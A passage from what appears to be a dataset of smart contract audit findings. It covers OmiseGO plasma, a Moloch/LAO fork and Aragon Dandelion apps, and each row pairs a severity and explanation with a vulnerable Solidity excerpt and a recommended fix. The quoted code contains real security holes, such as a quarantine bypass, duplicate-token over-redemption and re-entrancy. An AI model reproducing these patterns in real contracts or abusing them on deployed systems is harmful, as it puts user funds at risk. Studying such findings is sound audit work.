leaf;\\n uint256 j = index;\\n // Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\n for (uint256 i = 32; i 
<= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(proofElement, computedHash));\\n }\\n j = j / 2;\\n }\\n\\n return computedHash == rootHash;\\n}\\n```\\n -Maintainer can bypass exit game quarantine by registering not-yet-deployed contractsчmediumчThe plasma framework uses an `ExitGameRegistry` to allow the maintainer to add new exit games after deployment. An exit game is any arbitrary contract. In order to prevent the maintainer from adding malicious exit games that steal user funds, the framework uses a “quarantine” system whereby newly-registered exit games have restricted permissions until their quarantine period has expired. The quarantine period is by default `3 * minExitPeriod`, and is intended to facilitate auditing of the new exit game's functionality by the plasma users.\\nHowever, by registering an exit game at a contract which has not yet been deployed, the maintainer can prevent plasma users from auditing the game until the quarantine period has expired. After the quarantine period has expired, the maintainer can deploy the malicious exit game and immediately steal funds.\\nExplanation\\nExit games are registered in the following function, callable only by the plasma contract maintainer:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. 
Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, \"Should not register with tx type 0\");\\n require(\\_contract != address(0), \"Should not register with an empty exit game address\");\\n require(\\_exitGames[\\_txType] == address(0), \"The tx type is already registered\");\\n require(\\_exitGameToTxType[\\_contract] == 0, \"The exit game contract is already registered\");\\n require(Protocol.isValidProtocol(\\_protocol), \"Invalid protocol value\");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nNotably, the function does not check the `extcodesize` of the submitted contract. 
As such, the maintainer can submit the address of a contract which does not yet exist and is not auditable.\\nAfter at least `3 * minExitPeriod` seconds pass, the submitted contract now has full permissions as a registered exit game and can pass all checks using the `onlyFromNonQuarantinedExitGame` modifier:\\n```\\n/\\*\\*\\n \\* @notice A modifier to verify that the call is from a non-quarantined exit game\\n \\*/\\nmodifier onlyFromNonQuarantinedExitGame() {\\n require(\\_exitGameToTxType[msg.sender] != 0, \"The call is not from a registered exit game contract\");\\n require(!\\_exitGameQuarantine.isQuarantined(msg.sender), \"ExitGame is quarantined\");\\n \\_;\\n}\\n```\\n\\nAdditionally, the submitted contract passes checks made by external contracts using the `isExitGameSafeToUse` function:\\n```\\n/\\*\\*\\n \\* @notice Checks whether the contract is safe to use and is not under quarantine\\n \\* @dev Exposes information about exit games quarantine\\n \\* @param \\_contract Address of the exit game contract\\n \\* @return boolean Whether the contract is safe to use and is not under quarantine\\n \\*/\\nfunction isExitGameSafeToUse(address \\_contract) public view returns (bool) {\\n return \\_exitGameToTxType[\\_contract] != 0 && !\\_exitGameQuarantine.isQuarantined(\\_contract);\\n}\\n```\\n\\nThese permissions allow a registered quarantine to:\\nWithdraw any users' tokens from ERC20Vault:\\n```\\nfunction withdraw(address payable receiver, address token, uint256 amount) external onlyFromNonQuarantinedExitGame {\\n IERC20(token).safeTransfer(receiver, amount);\\n emit Erc20Withdrawn(receiver, token, amount);\\n}\\n```\\n\\nWithdraw any users' ETH from EthVault:\\n```\\nfunction withdraw(address payable receiver, uint256 amount) external onlyFromNonQuarantinedExitGame {\\n // we do not want to block exit queue if transfer is unucessful\\n // solhint-disable-next-line avoid-call-value\\n (bool success, ) = receiver.call.value(amount)(\"\");\\n if (success) 
{\\n emit EthWithdrawn(receiver, amount);\\n } else {\\n emit WithdrawFailed(receiver, amount);\\n }\\n```\\n\\nActivate and deactivate the `ExitGameController` reentrancy mutex:\\n```\\nfunction activateNonReentrant() external onlyFromNonQuarantinedExitGame() {\\n require(!mutex, \"Reentrant call\");\\n mutex = true;\\n}\\n```\\n\\n```\\nfunction deactivateNonReentrant() external onlyFromNonQuarantinedExitGame() {\\n require(mutex, \"Not locked\");\\n mutex = false;\\n}\\n```\\n\\n`enqueue` arbitrary exits:\\n```\\nfunction enqueue(\\n uint256 vaultId,\\n address token,\\n uint64 exitableAt,\\n TxPosLib.TxPos calldata txPos,\\n uint160 exitId,\\n IExitProcessor exitProcessor\\n)\\n external\\n onlyFromNonQuarantinedExitGame\\n returns (uint256)\\n{\\n bytes32 key = exitQueueKey(vaultId, token);\\n require(hasExitQueue(key), \"The queue for the (vaultId, token) pair is not yet added to the Plasma framework\");\\n PriorityQueue queue = exitsQueues[key];\\n\\n uint256 priority = ExitPriority.computePriority(exitableAt, txPos, exitId);\\n\\n queue.insert(priority);\\n delegations[priority] = exitProcessor;\\n\\n emit ExitQueued(exitId, priority);\\n return priority;\\n}\\n```\\n\\nFlag outputs as “spent”:\\n```\\nfunction flagOutputSpent(bytes32 \\_outputId) external onlyFromNonQuarantinedExitGame {\\n require(\\_outputId != bytes32(\"\"), \"Should not flag with empty outputId\");\\n isOutputSpent[\\_outputId] = true;\\n}\\n```\\nч`registerExitGame` should check that `extcodesize` of the submitted contract is non-zero.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/410чч```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. 
Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, \"Should not register with tx type 0\");\\n require(\\_contract != address(0), \"Should not register with an empty exit game address\");\\n require(\\_exitGames[\\_txType] == address(0), \"The tx type is already registered\");\\n require(\\_exitGameToTxType[\\_contract] == 0, \"The exit game contract is already registered\");\\n require(Protocol.isValidProtocol(\\_protocol), \"Invalid protocol value\");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n -EthVault - Unused state variableчlowчThe state variable `withdrawEntryCounter` is not used in the code.\\n```\\nuint256 private withdrawEntryCounter = 0;\\n```\\nчRemove it from the contract.чч```\\nuint256 private withdrawEntryCounter = 0;\\n```\\n -ECDSA error value is not handledчlowчResolution\\nThis was addressed in commit 32288ccff5b867a7477b4eaf3beb0587a4684d7a by adding a check that the returned value is nonzero.\\nThe OpenZeppelin `ECDSA` library returns `address(0x00)` for many cases with malformed signatures:\\n```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n return address(0);\\n}\\n\\nif (v != 27 && v != 28) {\\n return address(0);\\n}\\n```\\n\\nThe `PaymentOutputToPaymentTxCondition` contract does not explicitly handle this case:\\n```\\naddress payable owner = 
inputTx.outputs[outputIndex].owner();\\nrequire(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), \"Tx in not signed correctly\");\\n\\nreturn true;\\n```\\nчAdding a check to handle this case will make it easier to reason about the code.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/454чч```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n return address(0);\\n}\\n\\nif (v != 27 && v != 28) {\\n return address(0);\\n}\\n```\\n -No existence checks on framework block and timestamp readsчlowчThe exit game libraries make several queries to the main `PlasmaFramework` contract where plasma block hashes and timestamps are stored. In multiple locations, the return values of these queries are not checked for existence.\\nPaymentStartStandardExit.setupStartStandardExitData:\\n```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n\\nPaymentChallengeIFENotCanonical.respond:\\n```\\n(bytes32 root, ) = self.framework.blocks(utxoPos.blockNum());\\n```\\n\\nPaymentPiggybackInFlightExit.enqueue:\\n```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n\\nTxFinalizationVerifier.checkInclusionProof:\\n```\\n(bytes32 root,) = data.framework.blocks(data.txPos.blockNum());\\n```\\nчAlthough none of these examples seem exploitable, adding existence checks makes it easier to reason about the code. 
Each query to `PlasmaFramework.blocks` should be followed with a check that the returned value is nonzero.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/463чч```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n -BondSize - effectiveUpdateTime should be uint64чlowчIn BondSize, the mechanism to update the size of the bond has a grace period after which the new bond size becomes active.\\nWhen updating the bond size, the time is casted as a `uint64` and saved in a `uint128` variable.\\n```\\nuint128 effectiveUpdateTime;\\n```\\n\\n```\\nuint64 constant public WAITING\\_PERIOD = 2 days;\\n```\\n\\n```\\nself.effectiveUpdateTime = uint64(now) + WAITING\\_PERIOD;\\n```\\n\\nThere's no need to use a `uint128` to save the time if it never will take up that much space.чChange the type of the `effectiveUpdateTime` to `uint64`.\\n```\\n- uint128 effectiveUpdateTime;\\n+ uint64 effectiveUpdateTime;\\n```\\nчч```\\nuint128 effectiveUpdateTime;\\n```\\n -PaymentExitGame contains several redundant plasmaFramework declarationsчlowч`PaymentExitGame` inherits from both `PaymentInFlightExitRouter` and `PaymentStandardExitRouter`. All three contracts declare and initialize their own `PlasmaFramework` variable. This pattern can be misleading, and may lead to subtle issues in future versions of the code.\\n`PaymentExitGame` declaration:\\n```\\nPlasmaFramework private plasmaFramework;\\n```\\n\\n`PaymentInFlightExitRouter` declaration:\\n```\\nPlasmaFramework private framework;\\n```\\n\\n`PaymentStandardExitRouter` declaration:\\n```\\nPlasmaFramework private framework;\\n```\\n\\nEach variable is initialized in the corresponding file's constructor.чIntroduce an inherited contract common to `PaymentStandardExitRouter` and `PaymentInFlightExitRouter` with the `PlasmaFramework` variable. 
Make the variable internal so it is visible to inheriting contracts.чч```\\nPlasmaFramework private plasmaFramework;\\n```\\n -Creating proposal is not trustless in Pull PatternчhighчUsually, if someone submits a proposal and transfers some amount of tribute tokens, these tokens are transferred back if the proposal is rejected. But if the proposal is not processed before the emergency processing, these tokens will not be transferred back to the proposer. This might happen if a tribute token or a deposit token transfers are blocked.\\n```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n \"failing vote token transfer failed\"\\n );\\n```\\n\\nTokens are not completely lost in that case, they now belong to the LAO shareholders and they might try to return that money back. But that requires a lot of coordination and time and everyone who ragequits during that time will take a part of that tokens with them.чResolution\\nthis issue no longer exists in the Pull Pattern update, due to the fact that emergency processing and in function ERC20 transfers are removed.\\nPull pattern for token transfers would solve the issue.чч```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n \"failing vote token transfer failed\"\\n );\\n```\\n -Emergency processing can be blocked in Pull PatternчhighчThe main reason for the emergency processing mechanism is that there is a chance that some token transfers might be blocked. For example, a sender or a receiver is in the USDC blacklist. 
Emergency processing saves from this problem by not transferring tribute token back to the user (if there is some) and rejecting the proposal.\\n```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n \"failing vote token transfer failed\"\\n );\\n```\\n\\nThe problem is that there is still a deposit transfer back to the sponsor and it could be potentially blocked too. If that happens, proposal can't be processed and the LAO is blocked.чImplementing pull pattern for all token withdrawals would solve the problem. The alternative solution would be to also keep the deposit tokens in the LAO, but that makes sponsoring the proposal more risky for the sponsor.чч```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n \"failing vote token transfer failed\"\\n );\\n```\\n -Token Overflow might result in system halt or loss of fundsчhighчIf a token overflows, some functionality such as `processProposal`, `cancelProposal` will break due to safeMath reverts. The overflow could happen because the supply of the token was artificially inflated to oblivion.\\nThis issue was pointed out by Heiko Fisch in Telegram chat.\\nAny function using `internalTransfer()` can result in an overflow:\\n```\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256) {\\n return x >= y ? x : y;\\n}\\n```\\nчWe recommend to allow overflow for broken or malicious tokens. This is to prevent system halt or loss of funds. 
It should be noted that in case an overflow occurs, the balance of the token will be incorrect for all token holders in the system.\\n`rageKick`, `rageQuit` were fixed by not using safeMath within the function code, however this fix is risky and not recommended, as there are other overflows in other functions that might still result in system halt or loss of funds.\\nOne suggestion is having a function named `unsafeInternalTransfer()` which does not use safeMath for the cases that overflow should be allowed. This mainly adds better readability to the code.\\nIt is still a risky fix and a better solution should be planned.чч```\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256) {\\n return x >= y ? x : y;\\n}\\n```\\n -Whitelisted tokens limitчhighч`_ragequit` function is iterating over all whitelisted tokens:\\n```\\nfor (uint256 i = 0; i < tokens.length; i++) {\\n uint256 amountToRagequit = fairShare(userTokenBalances[GUILD][tokens[i]], sharesAndLootToBurn, initialTotalSharesAndLoot);\\n // deliberately not using safemath here to keep overflows from preventing the function execution (which would break ragekicks)\\n // if a token overflows, it is because the supply was artificially inflated to oblivion, so we probably don't care about it anyways\\n userTokenBalances[GUILD][tokens[i]] -= amountToRagequit;\\n userTokenBalances[memberAddress][tokens[i]] += amountToRagequit;\\n}\\n```\\n\\nIf the number of tokens is too big, a transaction can run out of gas and all funds will be blocked forever. Ballpark estimation of this number is around 300 tokens based on the current OpCode gas costs and the block gas limit.чA simple solution would be just limiting the number of whitelisted tokens.\\nIf the intention is to invest in many new tokens over time, and it's not an option to limit the number of whitelisted tokens, it's possible to add a function that removes tokens from the whitelist. 
For example, it's possible to add a new type of proposals, that is used to vote on token removal if the balance of this token is zero. Before voting for that, shareholders should sell all the balance of that token.чч```\\nfor (uint256 i = 0; i < tokens.length; i++) {\\n uint256 amountToRagequit = fairShare(userTokenBalances[GUILD][tokens[i]], sharesAndLootToBurn, initialTotalSharesAndLoot);\\n // deliberately not using safemath here to keep overflows from preventing the function execution (which would break ragekicks)\\n // if a token overflows, it is because the supply was artificially inflated to oblivion, so we probably don't care about it anyways\\n userTokenBalances[GUILD][tokens[i]] -= amountToRagequit;\\n userTokenBalances[memberAddress][tokens[i]] += amountToRagequit;\\n}\\n```\\n -Whitelist proposal duplicate Won't FixчlowчEvery time when a whitelist proposal is sponsored, it's checked that there is no other sponsored whitelist proposal with the same token. This is done in order to avoid proposal duplicates.\\n```\\n// whitelist proposal\\nif (proposal.flags[4]) {\\n require(!tokenWhitelist[address(proposal.tributeToken)], \"cannot already have whitelisted the token\");\\n require(!proposedToWhitelist[address(proposal.tributeToken)], 'already proposed to whitelist');\\n proposedToWhitelist[address(proposal.tributeToken)] = true;\\n```\\n\\nThe issue is that even though you can't sponsor a duplicate proposal, you can still submit a new proposal with the same token.чCheck that there is currently no sponsored proposal with the same token on proposal submission.чч```\\n// whitelist proposal\\nif (proposal.flags[4]) {\\n require(!tokenWhitelist[address(proposal.tributeToken)], \"cannot already have whitelisted the token\");\\n require(!proposedToWhitelist[address(proposal.tributeToken)], 'already proposed to whitelist');\\n proposedToWhitelist[address(proposal.tributeToken)] = true;\\n```\\n -Moloch - bool[6] flags can be changed to a dedicated structure Won't 
FixчlowчThe Moloch contract uses a structure that includes an array of bools to store a few flags about the proposal:\\n```\\nbool[6] flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\n\\nThis makes reasoning about the correctness of the code a bit complicated because one needs to remember what each item in the flag list stands for. To make the reader's life simpler, a dedicated structure can be created that incorporates all of the required flags.\\n```\\n bool[6] memory flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\nчBased on the provided examples change the `bool[6] flags` to the proposed examples.\\nFlags as bool array with enum (proposed)\\nThis second contract implements the `flags` as a defined structure with each named element representing a specific flag. This method makes clear which flag is accessed because they are referred to by the name, not by the index.\\nThis third contract has the least amount of changes to the code and uses an enum structure to handle the index.\\n```\\npragma solidity 0.5.15;\\n\\ncontract FlagsEnum {\\n struct Proposal {\\n address applicant;\\n uint value;\\n bool[3] flags; // [sponsored, processed, kicked]\\n }\\n \\n enum ProposalFlags {\\n SPONSORED,\\n PROCESSED,\\n KICKED\\n }\\n \\n uint proposalCount;\\n \\n mapping(uint256 => Proposal) public proposals;\\n \\n function addProposal(uint \\_value, bool \\_sponsored, bool \\_processed, bool \\_kicked) public returns (uint) {\\n Proposal memory proposal = Proposal({\\n applicant: msg.sender,\\n value: \\_value,\\n flags: [\\_sponsored, \\_processed, \\_kicked]\\n });\\n \\n proposals[proposalCount] = proposal;\\n proposalCount += 1;\\n \\n return (proposalCount);\\n }\\n \\n function getProposal(uint \\_proposalId) public view returns (address, uint, bool, bool, bool) {\\n return (\\n proposals[\\_proposalId].applicant,\\n proposals[\\_proposalId].value,\\n 
proposals[\\_proposalId].flags[uint(ProposalFlags.SPONSORED)],\\n proposals[\\_proposalId].flags[uint(ProposalFlags.PROCESSED)],\\n proposals[\\_proposalId].flags[uint(ProposalFlags.KICKED)]\\n );\\n }\\n}\\n```\\nчч```\\nbool[6] flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\n -Passing duplicate tokens to Redemptions and TokenRequest may have unintended consequencesчmediumчBoth `Redemptions` and `TokenRequest` are initialized with a list of acceptable tokens to use with each app. For `Redemptions`, the list of tokens corresponds to an organization's treasury assets. For `TokenRequest`, the list of tokens corresponds to tokens accepted for payment to join an organization. Neither contract makes a uniqueness check on input tokens during initialization, which can lead to unintended behavior.\\nIn `Redemptions`, each of an organization's assets are redeemed according to the sender's proportional ownership in the org. The redemption process iterates over the `redeemableTokens` list, paying out the sender their proportion of each token listed:\\n```\\nfor (uint256 i = 0; i < redeemableTokens.length; i++) {\\n vaultTokenBalance = vault.balance(redeemableTokens[i]);\\n\\n redemptionAmount = \\_burnableAmount.mul(vaultTokenBalance).div(burnableTokenTotalSupply);\\n totalRedemptionAmount = totalRedemptionAmount.add(redemptionAmount);\\n\\n if (redemptionAmount > 0) {\\n vault.transfer(redeemableTokens[i], msg.sender, redemptionAmount);\\n }\\n}\\n```\\n\\nIf a token address is included more than once, the sender will be paid out more than once, potentially earning many times more than their proportional share of the token.\\nIn `TokenRequest`, this behavior does not allow for any significant deviation from expected behavior. 
It was included because the initialization process is similar to that of `Redemptions`.чResolution\\nThis was addressed in Redemptions commit 2b0034206a5b9cdf239da7a51900e89d9931554f by checking `redeemableTokenAdded[token] == false` for each subsequent token added during initialization. Note that ordering is not enforced.\\nAdditionally, the issue in `TokenRequest` was addressed in commit eb4181961093439f142f2e74eb706b7f501eb5c0 by requiring that each subsequent token added during initialization has a value strictly greater than the previous token added.\\nDuring initialization in both apps, check that input token addresses are unique. One simple method is to require that token addresses are submitted in ascending order, and that each subsequent address added is greater than the one before.чч```\\nfor (uint256 i = 0; i < redeemableTokens.length; i++) {\\n vaultTokenBalance = vault.balance(redeemableTokens[i]);\\n\\n redemptionAmount = \\_burnableAmount.mul(vaultTokenBalance).div(burnableTokenTotalSupply);\\n totalRedemptionAmount = totalRedemptionAmount.add(redemptionAmount);\\n\\n if (redemptionAmount > 0) {\\n vault.transfer(redeemableTokens[i], msg.sender, redemptionAmount);\\n }\\n}\\n```\\n -The Delay app allows scripts to be paused even after execution time has elapsedчmediumчThe `Delay` app is used to configure a delay between when an evm script is created and when it is executed. 
The entry point for this process is `Delay.delayExecution`, which stores the input script with a future execution date:\\n```\\nfunction \\_delayExecution(bytes \\_evmCallScript) internal returns (uint256) {\\n uint256 delayedScriptIndex = delayedScriptsNewIndex;\\n delayedScriptsNewIndex++;\\n\\n delayedScripts[delayedScriptIndex] = DelayedScript(getTimestamp64().add(executionDelay), 0, \\_evmCallScript);\\n\\n emit DelayedScriptStored(delayedScriptIndex);\\n\\n return delayedScriptIndex;\\n}\\n```\\n\\nAn auxiliary capability of the `Delay` app is the ability to “pause” the delayed script, which sets the script's `pausedAt` value to the current block timestamp:\\n```\\nfunction pauseExecution(uint256 \\_delayedScriptId) external auth(PAUSE\\_EXECUTION\\_ROLE) {\\n require(!\\_isExecutionPaused(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_PAUSE);\\n delayedScripts[\\_delayedScriptId].pausedAt = getTimestamp64();\\n\\n emit ExecutionPaused(\\_delayedScriptId);\\n}\\n```\\n\\nA paused script cannot be executed until `resumeExecution` is called, which extends the script's `executionTime` by the amount of time paused. Essentially, the delay itself is paused:\\n```\\nfunction resumeExecution(uint256 \\_delayedScriptId) external auth(RESUME\\_EXECUTION\\_ROLE) {\\n require(\\_isExecutionPaused(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_RESUME);\\n DelayedScript storage delayedScript = delayedScripts[\\_delayedScriptId];\\n\\n uint64 timePaused = getTimestamp64().sub(delayedScript.pausedAt);\\n delayedScript.executionTime = delayedScript.executionTime.add(timePaused);\\n delayedScript.pausedAt = 0;\\n\\n emit ExecutionResumed(\\_delayedScriptId);\\n}\\n```\\n\\nA delayed script whose execution time has passed and is not currently paused should be able to be executed via the `execute` function. 
However, the `pauseExecution` function still allows the aforementioned script to be paused, halting execution.чAdd a check to `pauseExecution` to ensure that execution is not paused if the script's execution delay has already transpired.чч```\\nfunction \\_delayExecution(bytes \\_evmCallScript) internal returns (uint256) {\\n uint256 delayedScriptIndex = delayedScriptsNewIndex;\\n delayedScriptsNewIndex++;\\n\\n delayedScripts[delayedScriptIndex] = DelayedScript(getTimestamp64().add(executionDelay), 0, \\_evmCallScript);\\n\\n emit DelayedScriptStored(delayedScriptIndex);\\n\\n return delayedScriptIndex;\\n}\\n```\\n -Misleading intentional misconfiguration possible through misuse of newToken and newBaseInstanceчmediumчThe instantiation process for a Dandelion organization requires two separate external calls to `DandelionOrg`. There are two primary functions: `installDandelionApps`, and `newTokenAndBaseInstance`.\\n`installDandelionApps` relies on cached results from prior calls to `newTokenAndBaseInstance` and completes the initialization step for a Dandelion org.\\n`newTokenAndBaseInstance` is a wrapper around two publicly accessible functions: `newToken` and `newBaseInstance`. 
Called together, the functions:\\nDeploy a new `MiniMeToken` used to represent shares in an organization, and cache the address of the created token:\\n```\\n/\\*\\*\\n\\* @dev Create a new MiniMe token and save it for the user\\n\\* @param \\_name String with the name for the token used by share holders in the organization\\n\\* @param \\_symbol String with the symbol for the token used by share holders in the organization\\n\\*/\\nfunction newToken(string memory \\_name, string memory \\_symbol) public returns (MiniMeToken) {\\n MiniMeToken token = \\_createToken(\\_name, \\_symbol, TOKEN\\_DECIMALS);\\n \\_saveToken(token);\\n return token;\\n}\\n```\\n\\nCreate a new dao instance using Aragon's `BaseTemplate` contract:\\n```\\n/\\*\\*\\n\\* @dev Deploy a Dandelion Org DAO using a previously saved MiniMe token\\n\\* @param \\_id String with the name for org, will assign `[id].aragonid.eth`\\n\\* @param \\_holders Array of token holder addresses\\n\\* @param \\_stakes Array of token stakes for holders (token has 18 decimals, multiply token amount `\\* 10^18`)\\n\\* @param \\_useAgentAsVault Boolean to tell whether to use an Agent app as a more advanced form of Vault app\\n\\*/\\nfunction newBaseInstance(\\n string memory \\_id,\\n address[] memory \\_holders,\\n uint256[] memory \\_stakes,\\n uint64 \\_financePeriod,\\n bool \\_useAgentAsVault\\n)\\n public\\n{\\n \\_validateId(\\_id);\\n \\_ensureBaseSettings(\\_holders, \\_stakes);\\n\\n (Kernel dao, ACL acl) = \\_createDAO();\\n \\_setupBaseApps(dao, acl, \\_holders, \\_stakes, \\_financePeriod, \\_useAgentAsVault);\\n}\\n```\\n\\nSet up prepackaged Aragon apps, like `Vault`, `TokenManager`, and Finance:\\n```\\nfunction \\_setupBaseApps(\\n Kernel \\_dao,\\n ACL \\_acl,\\n address[] memory \\_holders,\\n uint256[] memory \\_stakes,\\n uint64 \\_financePeriod,\\n bool \\_useAgentAsVault\\n)\\n internal\\n{\\n MiniMeToken token = \\_getToken();\\n Vault agentOrVault = \\_useAgentAsVault ? 
\\_installDefaultAgentApp(\\_dao) : \\_installVaultApp(\\_dao);\\n TokenManager tokenManager = \\_installTokenManagerApp(\\_dao, token, TOKEN\\_TRANSFERABLE, TOKEN\\_MAX\\_PER\\_ACCOUNT);\\n Finance finance = \\_installFinanceApp(\\_dao, agentOrVault, \\_financePeriod == 0 ? DEFAULT\\_FINANCE\\_PERIOD : \\_financePeriod);\\n\\n \\_mintTokens(\\_acl, tokenManager, \\_holders, \\_stakes);\\n \\_saveBaseApps(\\_dao, finance, tokenManager, agentOrVault);\\n \\_saveAgentAsVault(\\_dao, \\_useAgentAsVault);\\n\\n}\\n```\\n\\nNote that `newToken` and `newBaseInstance` can be called separately. The token created in `newToken` is cached in `_saveToken`, which overwrites any previously-cached value:\\n```\\nfunction \\_saveToken(MiniMeToken \\_token) internal {\\n DeployedContracts storage senderDeployedContracts = deployedContracts[msg.sender];\\n\\n senderDeployedContracts.token = address(\\_token);\\n}\\n```\\n\\nCached tokens are retrieved in _getToken:\\n```\\nfunction \\_getToken() internal returns (MiniMeToken) {\\n DeployedContracts storage senderDeployedContracts = deployedContracts[msg.sender];\\n require(senderDeployedContracts.token != address(0), ERROR\\_MISSING\\_TOKEN\\_CONTRACT);\\n\\n MiniMeToken token = MiniMeToken(senderDeployedContracts.token);\\n return token;\\n}\\n```\\n\\nBy exploiting the overwriteable caching mechanism, it is possible to intentionally misconfigure Dandelion orgs.\\n`installDandelionApps` uses `_getToken` to associate a token with the `DandelionVoting` app. The value returned from `_getToken` depends on the sender's previous call to `newToken`, which overwrites any previously-cached value. 
The steps for intentional misconfiguration are as follows:\\nSender calls `newTokenAndBaseInstance`, creating token `m0` and DAO `A`.\\nThe `TokenManager` app in `A` is automatically configured to be the controller of `m0`.\\n`m0` is cached using `_saveToken`.\\nDAO `A` apps are cached for future use using `_saveBaseApps` and `_saveAgentAsVault`.\\nSender calls `newToken`, creating token `m1`, and overwriting the cache of `m0`.\\nFuture calls to `_getToken` will retrieve `m1`.\\nThe `DandelionOrg` contract is the controller of `m1`.\\nSender calls `installDandelionApps`, which installs Dandelion apps in DAO `A`\\nThe `DandelionVoting` app is configured to use the current cached token, `m1`, rather than the token associated with `A.TokenManager`, `m0`\\nFurther calls to `newBaseInstance` and `installDandelionApps` create DAO `B`, populate it with Dandelion apps, and assign `B.TokenManager` as the controller of the earlier `DandelionVoting` app token, `m0`.\\nMany different misconfigurations are possible, and some may be underhandedly abusable.чMake `newToken` and `newBaseInstance` internal so they are only callable via `newTokenAndBaseInstance`.чч```\\n/\\*\\*\\n\\* @dev Create a new MiniMe token and save it for the user\\n\\* @param \\_name String with the name for the token used by share holders in the organization\\n\\* @param \\_symbol String with the symbol for the token used by share holders in the organization\\n\\*/\\nfunction newToken(string memory \\_name, string memory \\_symbol) public returns (MiniMeToken) {\\n MiniMeToken token = \\_createToken(\\_name, \\_symbol, TOKEN\\_DECIMALS);\\n \\_saveToken(token);\\n return token;\\n}\\n```\\n -Delay.execute can re-enter and re-execute the same script twiceчlowч`Delay.execute` does not follow the “checks-effects-interactions” pattern, and deletes a delayed script only after the script is run. 
Because the script being run executes arbitrary external calls, a script can be created that re-enters `Delay` and executes itself multiple times before being deleted:\\n```\\n/\\*\\*\\n\\* @notice Execute the script with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script to execute\\n\\*/\\nfunction execute(uint256 \\_delayedScriptId) external {\\n require(canExecute(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_EXECUTE);\\n runScript(delayedScripts[\\_delayedScriptId].evmCallScript, new bytes(0), new address[](0));\\n\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutedScript(\\_delayedScriptId);\\n}\\n```\\nчAdd the `Delay` contract address to the `runScript` blacklist, or delete the delayed script from storage before it is run.чч```\\n/\\*\\*\\n\\* @notice Execute the script with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script to execute\\n\\*/\\nfunction execute(uint256 \\_delayedScriptId) external {\\n require(canExecute(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_EXECUTE);\\n runScript(delayedScripts[\\_delayedScriptId].evmCallScript, new bytes(0), new address[](0));\\n\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutedScript(\\_delayedScriptId);\\n}\\n```\\n -Delay.cancelExecution should revert on a non-existent script idчlowч`cancelExecution` makes no existence check on the passed-in script ID, clearing its storage slot and emitting an event:\\n```\\n/\\*\\*\\n\\* @notice Cancel script execution with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script execution to cancel\\n\\*/\\nfunction cancelExecution(uint256 \\_delayedScriptId) external auth(CANCEL\\_EXECUTION\\_ROLE) {\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutionCancelled(\\_delayedScriptId);\\n}\\n```\\nчAdd a check that the passed-in script exists.чч```\\n/\\*\\*\\n\\* @notice Cancel script execution with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the 
